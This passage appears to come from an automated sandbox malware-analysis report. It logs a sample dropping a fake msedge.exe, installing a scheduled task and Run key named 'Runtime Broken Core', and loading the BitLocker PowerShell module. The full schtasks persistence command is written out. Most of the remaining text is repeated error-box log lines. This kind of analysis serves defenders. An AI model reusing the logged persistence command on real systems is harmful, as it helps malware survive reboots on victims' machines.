File created: C:\Program Files\msedge.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Program Files\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"

Source: C:\Program Files\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Runtime Broken Core			Jump to behavior
Source: C:\Program Files\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Runtime Broken Core			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
